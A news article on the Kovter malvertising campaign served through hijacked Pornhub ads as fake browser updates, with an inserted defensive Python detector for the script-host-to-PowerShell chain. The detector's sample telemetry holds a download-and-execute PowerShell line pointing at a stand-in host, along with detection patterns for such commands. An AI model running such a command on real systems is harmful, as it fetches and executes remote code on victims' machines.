Pornhub hacked: Millions exposed to ad fraud malware masquerading as browser updates

Millions of Pornhub users were exposed to ad fraud malware after a hacker group hijacked advertising on the site to serve fake browser update adverts.

The ad fraud malware takes control of the infected system, earns money for its operators by generating fraudulent clicks on advertisements, and reports device data to its command-and-control (C&C) servers.

Millions of people who visited Pornhub in the United States, the UK, Canada and Australia over the past year were exposed to ad fraud malware that the attackers delivered through the site's advertising by placing fake browser update adverts.

Users of Google Chrome, Firefox and Microsoft Edge were all targeted. The malware, Kovter, has been used as click-fraud software for years.

According to security firm Proofpoint, which uncovered the operation, a group it tracks as KovCoreG hijacked Pornhub advertising to display fake browser update adverts designed to induce visitors to click on them. Chrome and Firefox users were told to install a browser update with the latest fixes, while Microsoft Edge users were offered an update to Adobe Flash Player.

A visitor who clicks the link is prompted to open a downloaded zip archive containing a single script: runme.js for Chrome, firefox-patch.js for Firefox, or FlashPlayer.hta for Edge, matching the lure shown for that browser.

When the visitor runs the file, it downloads and launches a PowerShell script with embedded shellcode. The shellcode in turn retrieves a file with an 'avi' extension that is in fact the Kovter ad fraud malware; once running, Kovter takes control of the device and generates clicks on advertisements for fraudulent gain.
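The chain above (a downloaded .js or .hta lure run by a Windows script host, which then spawns PowerShell to fetch the real payload) is what endpoint telemetry sees, so it is a natural detection target. The following is an added example, not code from the article or from Proofpoint: a small Python detector that scores process-creation events and raises severity when both links of the chain are present. The event records, their Sysmon-style field names, the download URL and the encoded command are all constructed for this example; only the three lure file names come from the text.

```python
"""
Detection sketch for the fake-browser-update chain described above:
a downloaded .js / .hta lure is executed by a Windows script host
(wscript.exe, cscript.exe or mshta.exe), which then spawns PowerShell
that fetches the real payload. The process-creation records, field
names, URL and encoded command below are constructed for this example.
"""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Lure file names reported for this campaign (see the text above).
LURE_NAMES = {"runme.js", "firefox-patch.js", "flashplayer.hta"}
SCRIPT_ARG = re.compile(r'"([^"]+\.(?:js|jse|hta|vbs|wsf))"|(\S+\.(?:js|jse|hta|vbs|wsf))\b', re.I)
USER_WRITABLE = re.compile(r"\\(downloads|temp|appdata\\local\\temp)\\", re.I)
PS_INDICATORS = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|"
    r"new-object\s+net\.webclient|-w(?:indowstyle)?\s+hidden|-nop\b|\.avi\b",
    re.I,
)
ENC_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_ps(text):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmd):
    """Recover the plaintext of a -EncodedCommand argument, or '' if absent or invalid."""
    m = ENC_ARG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def classify(event):
    """Return the reasons (possibly none) an event looks like one link of this chain."""
    reasons = []
    img = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]

    if img in SCRIPT_HOSTS:
        m = SCRIPT_ARG.search(cmd)
        if m:
            script = m.group(1) or m.group(2)
            if basename(script) in LURE_NAMES:
                reasons.append(f"known lure file name {basename(script)}")
            if USER_WRITABLE.search(script):
                reasons.append(f"{img} ran a script from a user-writable path")

    if img == "powershell.exe":
        if parent in SCRIPT_HOSTS:
            reasons.append(f"powershell.exe spawned by {parent}")
        if PS_INDICATORS.search(cmd):
            reasons.append("command line has hidden-window/download indicators")
        decoded = decode_encoded_command(cmd)
        if decoded and PS_INDICATORS.search(decoded):
            reasons.append("decoded -EncodedCommand downloads and executes content")
    return reasons


def detect(events):
    """Score each flagged event; 'high' when its parent is a flagged script host too."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        reasons = classify(e)
        if not reasons:
            continue
        parent = by_pid.get(e["ppid"])
        chained = (parent is not None and basename(parent["image"]) in SCRIPT_HOSTS
                   and bool(classify(parent)))
        findings.append({"pid": e["pid"], "image": basename(e["image"]),
                         "severity": "high" if chained else "medium", "reasons": reasons})
    return findings


# Constructed sample telemetry (Sysmon-style process-creation fields are an assumption).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://update.example.invalid/flash.avi')"
EVENTS = [
    {"pid": 4012, "ppid": 3120, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "command_line": "explorer.exe"},
    {"pid": 5220, "ppid": 4012, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\Downloads\runme.js"'},
    {"pid": 5304, "ppid": 5220, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGE2)},
    {"pid": 6100, "ppid": 4012, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Users\bob\Downloads\FlashPlayer.hta"'},
    {"pid": 6130, "ppid": 4012, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"pid": 7000, "ppid": 4012, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Program Files\Vendor\logon.js"'},
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} {f['image']}: " + "; ".join(f["reasons"]))
```

Run stand-alone, the script flags the wscript.exe and mshta.exe launches from the Downloads folder as medium and the PowerShell child of wscript.exe as high, while the administrator's `-File` PowerShell and the vendor logon script produce nothing. The indicator regex is deliberately loose; in production, an indicator hit without a script-host parent is low confidence on its own and should be tuned against the environment's scheduled tasks and management scripts.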

‘This attack chain exposed millions of potential victims in the US, Canada, the UK, and Australia, leveraging slight variations on a fake browser update scheme that worked on all three major Windows web browsers,’ said researchers at Proofpoint.

‘The attack has been active for more than a year and is ongoing elsewhere, but this particular infection pathway was shut down when the site operator and ad network were notified of the activity,’ they added.

According to the researchers, the operation is a classic example of attackers relying on social engineering and the human factor to get malware onto devices. The malware is disguised as a genuine browser update or other software, which is enough to fool unwary visitors.

‘While the payload in this case is ad fraud malware, it could just as easily have been ransomware, an information stealer, or any other malware. Regardless, threat actors are following the money and looking to more effective combinations of social engineering, targeting, and pre-filtering to infect new victims at scale,’ they added.

Copyright Lyonsdown Limited 2021
